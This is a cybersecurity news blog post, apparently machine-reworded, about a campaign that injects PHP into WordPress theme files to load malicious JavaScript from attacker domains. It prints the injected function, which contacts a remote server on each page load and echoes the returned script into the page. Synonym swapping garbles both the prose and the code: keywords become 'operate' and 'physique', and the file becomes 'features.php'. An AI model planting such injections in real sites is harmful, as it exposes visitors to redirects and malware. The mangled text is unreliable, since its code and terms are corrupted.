Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Hackers Weaponizing WordPress Websites by Injecting Malicious PHP Codes Silently

Posted on October 8, 2025October 8, 2025 By CWS

WordPress web sites have change into a chief goal for menace actors searching for to monetize site visitors and compromise customer safety.

In current months, a brand new malvertising marketing campaign has emerged, leveraging silent PHP code injections inside theme information to serve undesirable third-party scripts.

The assault blends seamlessly with respectable web site operations, delivering obfuscated JavaScript that redirects guests, shows pop-ups, and evades safety instruments with out elevating suspicion.

Initially found by a web site proprietor noticing unexplained script hundreds, the intrusion originated from a small block of PHP code appended to the lively theme’s features.php file.

This injection didn’t alter seen web page content material, as an alternative executing behind the scenes on each request.

Sucuri analysts recognized the marketing campaign after detecting anomalous JavaScript calls to attacker-controlled domains and blocklisting by a number of safety distributors.

The assault primarily exploits weak file permissions and outdated themes. By gaining write entry—usually by means of compromised credentials or susceptible plugins—hackers insert a seemingly benign operate that contacts a command-and-control server.

As soon as invoked by way of the wp_head hook, the operate fetches a dynamic JavaScript payload and echoes it into the web page’s part, making certain execution earlier than the remainder of the web page hundreds.

Sucuri researchers famous that the injected operate establishes a POST connection to a distant endpoint at hxxps://brazilc[.]com/advertisements.php, retrieves the malicious script, and embeds it instantly into the HTML doc.

The payload performs two essential actions: loading a traffic-distribution script from porsasystem.com/6m9x.js and injecting a hidden 1×1 pixel iframe that mimics Cloudflare’s problem platform.

These strategies allow pressured redirects, pop-ups, and evasion of safety scanners by disguising malicious exercise as respectable CDN operations.

An infection Mechanism

The an infection mechanism hinges on the next PHP operate injected into features.php:-

// Injected PHP operate in features.php
operate ti_custom_javascript() {
$response = wp_remote_post(
‘
array(‘timeout’ => 15, ‘physique’ => array(‘url’ => home_url()))
);
if (!is_wp_error($response)) {
echo wp_remote_retrieve_body($response);
}
}
add_action(‘wp_head’, ‘ti_custom_javascript’);

Upon every web page load, this operate silently executes, contacting the C&C server and printing the returned JavaScript payload into the web page header.

Payload (Supply – Sucuri)

The attacker’s script then hundreds additional malicious code asynchronously, leveraging attributes like data-cfasync=”false” and async to bypass Cloudflare Rocket Loader.

By embedding inside a hidden iframe, the malware evades detection and resides persistently till the injected code is eliminated.

Observe us on Google Information, LinkedIn, and X to Get Extra On the spot Updates, Set CSN as a Most popular Supply in Google.

Cyber Security News Tags:Codes, Hackers, Injecting, Malicious, PHP, Silently, Weaponizing, Websites, WordPress

Post navigation

Previous Post: CISA Warns of Zimbra Collaboration Suite (ZCS) XSS Zero-Day Vulnerability Actively Exploited in Attacks
Next Post: Ransomware Group Claims Attack on Beer Giant Asahi

Related Posts

Top 10 Best Web Application Penetration Testing Companies in 2025 Cyber Security News
Microsoft Authenticator to Discontinue Password Support and Cease Operations by August 2025 Cyber Security News
Microsoft Defender for Office 365 to Provide Detail Results for Spam, Phishing or Clean Emails Cyber Security News
PyPI Warns of New Phishing Attack Targeting Developers With Fake PyPI site Cyber Security News
South Asian APT Hackers Using Novel Tools to Compromise Phones of Military-Adjacent Members Cyber Security News
Microsoft Confirms August 2025 Update Causes Severe Lag in Windows 11 24H2, Windows 10 Versions Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • North Korean Hackers Have Stolen $2 Billion in Cryptocurrency in 2025
  • Radiflow Unveils New OT Security Platform
  • Ransomware Group Claims Attack on Beer Giant Asahi
  • Hackers Weaponizing WordPress Websites by Injecting Malicious PHP Codes Silently
  • CISA Warns of Zimbra Collaboration Suite (ZCS) XSS Zero-Day Vulnerability Actively Exploited in Attacks

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • North Korean Hackers Have Stolen $2 Billion in Cryptocurrency in 2025
  • Radiflow Unveils New OT Security Platform
  • Ransomware Group Claims Attack on Beer Giant Asahi
  • Hackers Weaponizing WordPress Websites by Injecting Malicious PHP Codes Silently
  • CISA Warns of Zimbra Collaboration Suite (ZCS) XSS Zero-Day Vulnerability Actively Exploited in Attacks

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News